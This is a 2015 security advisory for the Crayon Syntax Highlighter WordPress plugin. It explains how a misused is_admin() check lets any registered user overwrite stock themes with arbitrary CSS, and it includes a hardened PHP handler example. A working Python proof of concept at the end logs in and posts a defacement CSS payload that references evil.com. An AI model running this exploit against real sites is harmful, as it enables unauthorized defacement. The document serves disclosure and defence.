Crayon Syntax Highlighter 2.0 - 2.6.10, Defacement

The Crayon Syntax Highlighter plugin allows any registered user to call the AJAX method ‘crayon-theme-editor-save’. This is due to the incorrect use of ‘is_admin()’ as a check that the current user is an administrator. ‘is_admin()’ returns true under a number of conditions, some of which have nothing to do with whether the user is logged in as an administrator, and it should therefore not be relied upon for security purposes. The ‘crayon-theme-editor-save’ method was introduced in version 2.0, as seen in this diff. The ‘is_admin()’ check was added at a later date, but provides no protection whatsoever, as every request to ‘wp-admin/admin-ajax.php’ causes this function to return true.

crayon-syntax-highlighter/crayon_wp.class.php (excerpt)

add_action('wp_ajax_nopriv_crayon-tag-editor', 'CrayonTagEditorWP::content');
add_action('wp_ajax_crayon-highlight', 'CrayonWP::ajax_highlight');
add_action('wp_ajax_nopriv_crayon-highlight', 'CrayonWP::ajax_highlight');
if (is_admin()) {
    add_action('wp_ajax_crayon-ajax', 'CrayonWP::ajax');
    add_action('wp_ajax_crayon-theme-editor', 'CrayonThemeEditorWP::content');
    add_action('wp_ajax_crayon-theme-editor-save', 'CrayonThemeEditorWP::save');

When called, the AJAX method ‘crayon-theme-editor-save’ invokes the ‘save’ function of the CrayonThemeEditorWP class, defined in ‘crayon-syntax-highlighter/util/theme-editor/theme_editor.php’, as seen in this file. An attacker can craft the user-provided parameters such that it becomes possible to overwrite base themes with arbitrary CSS. In very old browsers this may result in stored cross-site scripting; however, as these browsers are rarely used anymore, this report terms the vulnerability a means of defacement. If a browser has a vulnerability when parsing images (PNG, SVG, etc.), it is possible that this could lead to an exploit being dropped via the attacker-controlled image, but the likelihood of this is low.
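The following is an added example, not the plugin's own code and not the fix that shipped in 2.7.0. It contrasts the ‘is_admin()’ gate from the excerpt above with a handler that enforces a capability check and a nonce, and that does not take the ‘allow_edit_stock_theme’ decision from the request. The function name, the ‘nonce’ field, the themes directory and the stock-theme list are assumptions.

```php
<?php
// Added example (not the plugin's code). Requires the WordPress runtime.

// Vulnerable pattern from the advisory: is_admin() is true for every request
// to wp-admin/admin-ajax.php, so any logged-in user reaches the save handler.
if (is_admin()) {
    add_action('wp_ajax_crayon-theme-editor-save', 'CrayonThemeEditorWP::save');
}

// Hardened pattern: register the hook unconditionally and authorize inside the
// handler, where the current user and the request are actually known.
add_action('wp_ajax_crayon-theme-editor-save', 'hardened_theme_editor_save');

// Assumed values: where user themes live and which theme ids are stock.
define('HARDENED_THEME_DIR', WP_CONTENT_DIR . '/uploads/crayon-themes/');
define('HARDENED_STOCK_THEMES', 'classic'); // comma-separated, assumed list

function hardened_theme_editor_save() {
    // 1. Capability check: only users allowed to manage the site may save.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('insufficient privileges', 403);
    }
    // 2. Nonce check: the client must send wp_create_nonce('crayon-theme-editor-save')
    //    in the 'nonce' field, so a forged cross-site request is rejected.
    check_ajax_referer('crayon-theme-editor-save', 'nonce');

    // 3. Server-side policy: stock themes are never writable, regardless of
    //    any allow_edit_stock_theme parameter the client sends.
    $id = sanitize_file_name((string) ($_POST['id'] ?? ''));
    $stock = explode(',', HARDENED_STOCK_THEMES);
    if ($id === '' || in_array($id, $stock, true)) {
        wp_send_json_error('theme id invalid or read-only', 400);
    }

    // 4. Treat the CSS as opaque text but strip tags, so a stored value can
    //    never close the <style> element it is later emitted into.
    $css = wp_strip_all_tags((string) ($_POST['css'] ?? ''));

    // 5. Write only under the themes directory; the sanitized id cannot
    //    contain path separators.
    if (!wp_mkdir_p(HARDENED_THEME_DIR)) {
        wp_send_json_error('cannot create theme directory', 500);
    }
    $written = file_put_contents(HARDENED_THEME_DIR . $id . '.css', $css);
    if ($written === false) {
        wp_send_json_error('write failed', 500);
    }
    wp_send_json_success(array('id' => $id, 'bytes' => $written));
}
```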

Homepage

https://wordpress.org/plugins/crayon-syntax-highlighter/

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:N/I:P/A:N)

Attack Scope

remote

Authorization Required

Registered

Mitigation

Update to version 2.7.0.

Proof of Concept

The following PoC will overwrite the ‘Classic’ theme with arbitrary CSS. This allows for defacement of the target site on pages where the Crayon Syntax Highlighter is used. The CSS in the ‘css’ payload causes all elements within the BODY element to be hidden, the string ‘testing’ to be inserted after the BODY content, and the background image of the HTML element to be changed to an arbitrary image.

import requests

s = requests.session()
target = 'http://localhost'

# Step 1: log in as an ordinary registered user; the session cookie is kept.
url = '%s/wp-login.php' % target
payload = {
    "log": "test",
    "pwd": "test",
    "wp-submit": "Log+In"
}
r = s.post(url, data=payload)

# Step 2: call the admin-ajax action; is_admin() is true for this endpoint,
# so the handler runs without any administrator capability check.
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
    "action": "crayon-theme-editor-save",
    "id": "classic",
    "name": "Classic",
    "css": "body>*{display:none} body::after{content:'testing'} html{background-image:url(http://evil.com/myimage.jpg)}",
    "version": "2.6.10",
    "allow_edit": 1,
    "allow_edit_stock_theme": 1
}
r = s.post(url, data=payload)

Timeline

  • 2015-03-22: Discovered
  • 2015-03-22: Vendor notified
  • 2015-03-22: Vendor responded
  • 2015-03-31: Update requested from Vendor
  • 2015-04-05: Vendor updated with fix method – stating would be released in the next few days
  • 2015-04-13: Update requested from Vendor
  • 2015-04-13: 2.7.0 Released – issue resolved
  • 2015-04-20: Advisory released